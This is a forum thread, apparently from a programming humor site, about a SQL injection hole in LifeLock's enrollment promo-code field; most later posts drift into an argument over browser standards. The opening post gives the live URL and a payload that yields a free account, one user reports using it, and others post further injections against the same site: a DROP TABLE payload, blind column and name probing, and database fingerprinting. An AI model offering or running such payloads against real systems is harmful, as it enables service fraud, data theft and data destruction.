Lifelock



  • No, this isn't a post about Lifelock's CEO (the one who has advertisements with his SSN in them) having his identity stolen.

     

    Go to the LifeLock enrollment site: https://secure.lifelock.com/enrollmentform.aspx

     

    For the promotion code, use

     

    ' OR 1 = 1 OR '

    (with quotes).

     

    Hilarity ensues. 



  • Wow, you mean I get a completely worthless product for FREE??

     

    Also, nice job with the link there.  I enjoy having to copy-and-paste text like this is some copy-and-paste sweatshop.  Jerk. 



  • @Colin McGuigan said:

    Hilarity ensues.

    I wouldn't exactly call that "hilarity", but it is a WTF. The thing is, who's gonna go all the way with this and see if someone manually reviews it at the end?



  • @AbbydonKrafts said:

    I wouldn't exactly call that "hilarity", but it is a WTF. The thing is, who's gonna go all the way with this and see if someone manually reviews it at the end?
     

    I don't think that a manual review could spot this at all. The site seems to be selecting all existing discounts that match the promo code, then using the cheapest one. Adding the sql snipped is making the SELECT statement return all rows in this table, of which then the row with the smallest cost is selected. This happens to be a complementary account, which is obviously free.

    From that point forward the actual values from the database row is used, and any review will look like the apropriate code was entered. 



  • How they want to protect me if they can't protect themselves!?

    I also like 'Hacker Safe' banner on the main page (bottom right) :D



  • @Nandurius said:

    From that point forward the actual values from the database row is used, and any review will look like the apropriate code was entered.

    The code isn't the problem as far as being the OR statement. I meant if they have some kind of review that would reveal that the applicant shouldn't have had access to the promotion at all. I'd imagine that a completely free account would probably even trigger a thorough manual review.



  • LOL!! it worked, i just signed up and got an e-mail from them:

    Dear XioPod, Thank you for enrolling with LifeLock®. You are the primary contact for the XioPod Family. You have elected the following payment option: Comp Plan, which includes a recurring payment of $ 0.00. This amount will be automatically charged to your credit card each month or year, depending on your payment option. Your Invoice Number is: [omitted] To contact us, please do not reply to this email. If you have any questions, please send a separate email to member.services@lifelock.com or give us a call at 1-877-543-3562 and select option 2. We are available 24/7. Thank you for your membership. Sincerely, LifeLock Member Services
    awesomeness



  • LOL, I can't believe you just tried that. wtg!

    Promo code: ' OR 1=1; DROP TABLE Customers --



  • @morbiuswilters said:

    Also, nice job with the link there.  I enjoy having to copy-and-paste text like this is some copy-and-paste sweatshop.  Jerk. 

    In all fairness to the OP, I've had the same problem.  I think there's some sort of WTF with this forum software.  Somethings when I put a link in a post it comes out fine and sometimes it doesn't,  even though I don't do anything differently.

     

     



  • @El_Heffe said:

    Somethings when I put a link in a post it comes out fine and sometimes it doesn't

    Lies! Plain-text editor does not fail.



  • @El_Heffe said:

    I think there's some sort of WTF with this forum software. 
     

    Funny, I have used IE7, FF3 (B1-5,RC1) and Safari on this forum and I have never seen the behavior you suggest.



  • @XioPod said:

    LOL!! it worked, i just signed up and got an e-mail from them:
    This amount will be automatically charged to your credit card each month or year, depending on your payment option.

     You didn't use your real card details did you? You really should bill free stuff to a test (Visa) card number like 4111 1111 1111 1111 ...



  • @MasterPlanSoftware said:

    @El_Heffe said:

    I think there's some sort of WTF with this forum software. 
     

    Funny, I have used IE7, FF3 (B1-5,RC1) and Safari on this forum and I have never seen the behavior you suggest.

    What, no Opera?



  • @bstorer said:

    What, no Opera?
     

    Nope, get a real browser.


  • Considered Harmful

    ' or [SomeColumnName] <> 1 or '

    Error if column doesn't exist, success if column does exist. If we figure out table names, we can union to select more data.

    [Name] is a valid column.



  • @MasterPlanSoftware said:

    @bstorer said:

    What, no Opera?
     

    Nope, get a real browser.


    ...

    @MasterPlanSoftware said:

    I have used IE7

    Wtf?


  • Considered Harmful

    ' OR Name like 'a%'-- or '

    Produces a comp account.

    ' OR Name like 'b%'-- or '

    Does not.



  • @joe.edwards said:

    ' or [SomeColumnName] <> 1 or '

    Error if column doesn't exist, success if column does exist. If we figure out table names, we can union to select more data.

    [Name] is a valid column.

    Kind of pointless though, cant see any way to get information out unless you can somehow insert a dynamic select and override the promotion description ("You save $10.00!") or whatever. Tricky without knowing the schema exactly.



  • @VisualD said:


    @MasterPlanSoftware said:

    I have used IE7

    Wtf?

     

    Do you not understand what I said? Do you not know what IE7 is?



  •  Step 1 is to figure out what db type it is... It could be oracle ' OR GREATEST(1,2) = 1 OR ' works.



  • @MasterPlanSoftware said:


    Do you not understand what I said? Do you not know what IE7 is?

    Not a real browser? As in, actually far enough from the standards that its not funny (yes I know its better than 6, doesn't exactly say much). To claim Opera is not a real browser when your implying IE7 is, is to me, somewhat laughable. As a web developer, Opera, FF and Safari display my valid xhtml / css / javascript almost identically, whereas IE(Whatever, maybe not 8) is invariably well out of kilter. A "Proper" browser to me would suggest one that actually follows international standards, like actually implementing that little known "css" thing properly, maybe even with a box model that actually makes sense.

    Thought it was pretty obvious really. I shall endeavor to be more verbose in future to aid in your comprehension.



  • @VisualD said:

    As a web developer
     

    Well there goes that credibility.... 

    If you think IE7 is the problem, then you don't understand the issue. Don't talk to me about standards.



  • @VisualD said:

    Not a real browser? As in, actually far enough from the standards that its not funny (yes I know its better than 6, doesn't exactly say much). To claim Opera is not a real browser when your implying IE7 is, is to me, somewhat laughable. As a web developer, Opera, FF and Safari display my valid xhtml / css / javascript almost identically, whereas IE(Whatever, maybe not 8) is invariably well out of kilter. A "Proper" browser to me would suggest one that actually follows international standards, like actually implementing that little known "css" thing properly, maybe even with a box model that actually makes sense.

    Thought it was pretty obvious really. I shall endeavor to be more verbose in future to aid in your comprehension.

    If you are writing pages in XHTML you are almost certainly serving up broken HTML.  Way to follow the standards there.  Also, all of the browsers have flaws.  IE has the largest install base so it is a defacto standard and if I had to choose only one browser to support, it would definitely be IE.  People who endlessly appeal to "the standards" without realizing most standards are hopelessly flawed and no software follows them properly annoy the hell out of me.  Seriously, get over it and write the goddamn code.  This is what we are paid for.  If it was so easy any idiot could do it then most of us wouldn't have jobs.  Also, Opera sucks and needs to die.  It's bad enough we have 3 mediocre browsers (IE, FF and Safari) but there is no reason for Opera to exist. 



  • @morbiuswilters said:

    endlessly appeal to "the standards" without realizing most standards are hopelessly flawed
     

    And I am sure that VisualD can sit down and read through the standards and write a perfect working browser too...

    What these /. rejects need to realize is IE sets the standard. Whoever has the most market share? Standard. Plain and simple. Cry about it all you want, but that is the way it works.



  • @MasterPlanSoftware said:

    Whoever has the most market share? Standard.

    In that case, IE needs to support my <blink> tags, because Netscape Navigator used to be the standard!



  • @bstorer said:

    In that case, IE needs to support my <blink> tags, because Netscape Navigator used to be the standard!
     

    I have submitted that bug report to the IE team many times, they never answer me back.



  • @MasterPlanSoftware said:

    What these /. rejects need to realize is IE sets the standard. Whoever has the most market share? Standard. Plain and simple. Cry about it all you want, but that is the way it works.

    Thanks, I'll keep crying about then. As loudly as I can manage.

    What you fail to understand is that standards give us a stable target for development. IE isn't a standard because it's not defined. We can observe IE's behavior, but Microsoft is free to change it at any given time, in any update. Real standards are written down, described thoroughly and unambiguously, and periodically reviewed and updated for improved clarity.

    I don't tolerate nebulous specifications at work. I certainly won't tolerate them from a company who gets touted as having "the most brilliant minds in the business."

    If your idea of a standard is "try to get it to work with IE," you don't know what a standard is. When I write HTML, I know it will look right on all the other browsers. They don't need 100% compliance for that, just good compliance. It's genuinely rare that ordinary HTML/CSS doesn't look right on them. I spend the bulk of my time creating content, and little to none of my time scrambling to get my work to look "acceptable" in an unpredictable environment. Maybe you don't consider your time as valuable as I consider mine.

    What this means to managers is: IE costs developers their time, and costs their employers money.



  • @MasterPlanSoftware said:

    What these /. rejects need to realize is IE sets the standard. Whoever has the most market share? Standard. Plain and simple.
     

    Except that IE doesn't seem to be pushing any new standard (at least not any more, and the IE vs Netscape non-standard tag race is well behind us). It's improving, but it still seems like the minimum effort is being put in by MS to prevent their less tech savvy users from immediately installing an alternate browser. Most of what's new in IE7 is just playing catch up with other browsers (e.g. tabs to compete with Firefox which was still years behind Opera. I wonder if the Opera devs get together with the Xerox PARC guys to moan about other people popularising their inventions).

    The W3C is still setting the standards because, well, noone's really actively pushing against them.

    @MasterPlanSoftware said:

    Cry about it all you want, but that is the way it works.
     

    Not all dissatisfaction with current situations is just "crying about it". Just because the majority are putting up with shit doesn't mean it's wrong to criticise it.

    @morbiuswilters said:

    endlessly appeal to "the standards" without realizing most standards are hopelessly flawed

    Everything has its flaws. Yes, you're spot on with the XHTML serving issue. The main issue with web standards though, seems to be the glacial pace of activity within the W3C. There are various talks about setting up alternate groups (I wish I could link to this, but it was a while ago that I was reading about it) to deal with this.

    Sometimes it'd be nice to have another full blown, standards decrying browser war, just to get things moving along. 



  • @drinkingbird said:

    The W3C is still setting the standards because, well, noone's really actively pushing against them.

    No, the W3C is still setting standards because that's all they do.



  • @morbiuswilters said:

    If you are writing pages in XHTML you are almost certainly serving up broken HTML.  Way to follow the standards there.  Also, all of the browsers have flaws.  IE has the largest install base so it is a defacto standard and if I had to choose only one browser to support, it would definitely be IE.  People who endlessly appeal to "the standards" without realizing most standards are hopelessly flawed and no software follows them properly annoy the hell out of me.  Seriously, get over it and write the goddamn code.  This is what we are paid for.  If it was so easy any idiot could do it then most of us wouldn't have jobs.  Also, Opera sucks and needs to die.  It's bad enough we have 3 mediocre browsers (IE, FF and Safari) but there is no reason for Opera to exist. 

    Well given that im serving xhtml, yes it's true, it wouldn't be valid html... and how is following the xhtml standard not following "the standards", it's just a different standard. One that works fine (for me, YMMV) in all the browsers listed, its css thats broken in IE. In my experience, css is also to blame for most of the minor problems with the other browsers.

    Yes I know I have to write the hacks, but it's a far stretch to say that removing them would cause us to lose jobs, quite the opposite, it would allow us to focus more on our actual job, delivering good software. As Vgr said: "If your idea of a standard is "try to get it to work with IE," you don't know what a standard is." Undocumented proprietary code does not count as a standard. I have the same issue with OOXML.

    As far as the strange vitriol directed at Opera itself, what does it matter if when I code for the 2nd most popular browser, it also magically works almost identically in Opera and Safari and in fact any mostly standards compliant browser*. Why shouldn't there be a choice? Are you anti-choice? Does it personally cause you problems? Do you have to invest any time in it?

    *(functionally if it supports or at least vaguely understands xhtml, visually if it supports at least css2 properly, and extra-functionality with javascript / css3.)

    @MasterPlanSoftware said:

    And I am sure that VisualD can sit down and read through the standards and write a perfect working browser too...

    Ridiculous argument, of course not, certainly not on my own in a reasonable time. Nor did I claim or imply that I could. Clearly no-one is going to be creating the perfect browser anytime soon. But FireFox and the rest make a decent stab at it. IE is good in many ways, but very weak in important ones, and this is from a company that clearly have the resources to do this at least as well as the others. So why drag their feet?. Its all about control.



  • @mxsscott said:

    @XioPod said:

    LOL!! it worked, i just signed up and got an e-mail from them:
    This amount will be automatically charged to your credit card each month or year, depending on your payment option.

     You didn't use your real card details did you? You really should bill free stuff to a test (Visa) card number like 4111 1111 1111 1111 ...

     

    it didn't require any! notice when you switch to comp coupon code the billing info box isn't shown. the real wtf is if you simple click submit on a blank app.. all the flashing X's almost gave me a seizure



  • VisualD: If you're serving XHTML, IE is a non-issue as IE does not support the XHTML mime-type. If your page works in IE, you're serving XHTML as HTML, which is indeed broken HTML as morbiuswilters said.



  • @XioPod said:

    LOL!! it worked, i just signed up and got an e-mail from them:

    awesomeness

     

    I think using sql injection to rip off a company to whom you're providing all of your personally identifying information is a minor WTF by itself.  

     -MBirchmeier



  • @MasterPlanSoftware said:

    @El_Heffe said:

    I think there's some sort of WTF with this forum software. 
     

    Funny, I have used IE7, FF3 (B1-5,RC1) and Safari on this forum and I have never seen the behavior you suggest.

     

     

    O RLY?



  • @mshade said:

    O RLY?
     

    Perhaps you should lurk a little more before acting like a little retard.

    There was no problem linking, because I don't stick links all over threads when I don't expect them to be followed. When you put a link into a post and it doesn't work, it is YOUR fault, not the forum software. Especially in an OP.

    Copying and pasting a url into a post is different than complaining "OMGz I can't make links work! Forum software sucks!"



  • Serving valid XHTML as text/html picks up on the doctype and renders in standards compliance mode in FF 2.0.0.14, Safari 3.1.1 (Win), Opera 9.27, IE7, and IE8b1. IE6 renders in quirks mode. IE6 requires CSS and javascript tricks to render properly, IE7 requires fewer CSS tricks and no js tricks to render properly, and IE8b1 requires no tricks (for the web site I'm developing anyway). I had considered switching everything to HTML 4.01, but when I saw it rendering in standards compliance mode on everything except IE6, I decided to leave it as-is.



  • I'm just sick of the rendering bugs in IE. Hacks upon hacks to make it work. And then the hacks start back-firing...

    For example, I had some CSS which had display:relative in the body tag to fix another rendering bug. Problem was putting this CSS into an iframe would cause the iframe to disappear in IE sometimes. Resizing the window would bring it back until you moused over a certain area. This bug took two days to figure out! So this meant separate CSS files for different pages. Luckily most of these weirdnesses could go into the conditional comments for IE so that normal browsers would only get the one CSS file.

    @Sir Twist said:

    IE7 requires fewer CSS tricks and no js tricks to render properly,

    IE7 still doesn't support PNG completely. :-( My cool icons are being converted back to GIF so they look half-way decent although the PNG versions are sweet in the non-IE browsers I test in.



  • @Zemm said:

    I'm just sick of the rendering bugs in IE.

    Haven't you heard MPS? What IE does is standard, make it fitting for IE and screw all the minor browsers. Why not use non-accessible table-based layout? It worked well in the past. Let's not look ahead! Let's reintroduce old features! marquee & blink tags, shiny blinking animated gifs, pink font on purple background, but with a repeated self-portrait behing the text (as a gif of course, because it is small and you still can see the purple background through its transparent color). position:fixeds can perfectly be emulated with frames, position:absolutes with another table around the existing layout, and so on. Screw the whole standards bullshit. IE ftw.

    Okay, now that we have that out of the way, we can finally return to topic, or can't we? I'm interested in whether XioPod's account is running well or whether joe.edwards already succeeded in dumping the customer table.



  • @Zemm said:

    IE7 still doesn't support PNG completely.

    I was pretty sure it did. What part is still missing?



  • @derula said:

    marquee & blink tags, shiny blinking animated gifs, pink font on purple background, but with a repeated self-portrait behing the text (as a gif of course, because it is small and you still can see the purple background through its transparent color). positionfixeds can perfectly be emulated with frames, positionabsolutes with another table around the existing layout, and so on.
     

    Dude, it's already been done.  



  • @Sir Twist said:

    Serving valid XHTML as text/html picks up on the doctype and renders in standards compliance mode in FF 2.0.0.14, Safari 3.1.1 (Win), Opera 9.27, IE7, and IE8b1. IE6 renders in quirks mode. IE6 requires CSS and javascript tricks to render properly, IE7 requires fewer CSS tricks and no js tricks to render properly, and IE8b1 requires no tricks (for the web site I'm developing anyway). I had considered switching everything to HTML 4.01, but when I saw it rendering in standards compliance mode on everything except IE6, I decided to leave it as-is.

    Wrong.  They render in standards-compliance mode as HTML not XHTML, so you are actually serving up broken HTML if you send XHTML as text/html.



  • @derula said:

    Haven't you heard MPS? What IE does is standard, make it fitting for IE and screw all the minor browsers. Why not use non-accessible table-based layout? It worked well in the past. Let's not look ahead! Let's reintroduce old features! marquee & blink tags, shiny blinking animated gifs, pink font on purple background, but with a repeated self-portrait behing the text (as a gif of course, because it is small and you still can see the purple background through its transparent color). positionfixeds can perfectly be emulated with frames, positionabsolutes with another table around the existing layout, and so on. Screw the whole standards bullshit. IE ftw.

    You miss the point completely and that is sad.  The standards are just guidelines and like any standard are not followed 100% by every user agent.  IE is close enough to the standard that it doesn't require a whole lot of workarounds to get content to render fine.  And honestly since IE is 90% or more of the market I don't mind doing a little extra work to reach those users.  The standards aren't there so you can write just write "standards-compliant" code and never have to test it.  Anyone who has done non-trivial web apps will have to create workarounds for FF, Safari and Opera as well, although not to the degree that one does for IE.  Still, Opera is something like 0.5% of the market, so I'm not that interested in spending time making sure everything renders correctly.  As far as the web goes, we actually have 4 relatively equal browsers.  Compared to the pain of SMTP and IMAP clients and servers as well as C (or C++ *shudder*) compilers, all four browsers are fairly interoperable.



  • @elgate said:

    Dude, it's already been done.

    Hey, they do have a pretty great flash media player, with spectrum analyzer and playlist and playback time. ... well, forget about the spectrum analyzer, but the playback time even has ten second precision! I've seen that nowhere else yet.

    @morbiuswilters said:

    [lengthy text]

    Yeah. I just wonder: why can't the 90% market share browser do what others are already doing? But I wonder many things. E.g., why don't some certain major German press agencies don't have any feeling for journalistic responsibility? ... Maybe I just ask too many questions. Still a child on the inside (at least).



  • @derula said:

    Yeah. I just wonder: why can't the 90% market share browser do what others are already doing? But I wonder many things. E.g., why don't some certain major German press agencies don't have any feeling for journalistic responsibility? ... Maybe I just ask too many questions.

    Probably because the actual differences between IE and FF are so minor.  Sure, we all know the numerous IE rendering or JS bugs, but really 99% of the time stuff works right.  Also, remember that MS can't just push out an update that patches every bug without severely affecting users.  There are a lot of pages written for IE or with IE-specific hacks that would break if it started rendering correctly.  Things like this have to go through many months of testing and deployment planning by 3rd parties.  Quite frankly, it doesn't bother me too much because at the end of the day I just spend a little extra time making my pages look right in IE.  It also limits the complexity of interfaces that can be developed in web apps which is a great thing because we do not need complex UIs built out of HTML and JS.  Hopefully IE's incompatibilities will continue until all complex UI work is done in Flash/Silverlight.

     

    @derula said:

    Still a child on the inside (at least).

    Your brother isn't the only one who should be watching his ass around MPS.

     



  • @morbiuswilters said:

    @derula said:
    Still a child on the inside (at least).
    Your brother isn't the only one who should be watching his ass around MPS.

    I'm not concerned. I'm sure my tight Lederhosen will scare him of. If not, I still have an undetonated bomb from WWII in my basement which I just happened to build a new detonator for. If that still doesn't help, I have some toxic gas here and have it ready and attached to my shower.



  • @derula said:

    If that still doesn't help, I have some toxic gas here and have it ready and attached to my shower.

    You are way more fun and cool than ammoQQ.



  • @morbiuswilters said:

    You are way more fun and cool than ammoQQ.

    ammoQ actually reminds me of a great quote from german-bash.org:

    @Rough translation said:

    <Sodaya> give me rights in the channel

    <shin> nope

    <Sodaya> why?

    <shin> because you're austrian

    <shin> the last austrian we gave op led us into total warfare



  • @derula said:

    ammoQ actually reminds me of a great quote from german-bash.org:
    ...
    <shin> because you're austrian
    <shin> the last austrian we gave op led us into total warfare

    *lol*

    Seems like Alex hasn't learned from history, neither have the Californians.



  • @morbiuswilters said:

    I enjoy having to copy-and-paste text like this is some copy-and-paste sweatshop.
    Ever heard of the 'referrer'? If so, you might see why one wouldn't want it showing up when directing others to hack a website.



  • @m0ffx said:

    Ever heard of the 'referrer'?
     

    No, not in this context. But I'm sure someone might occasionally check the referer to see where the hits are coming from. 


Log in to reply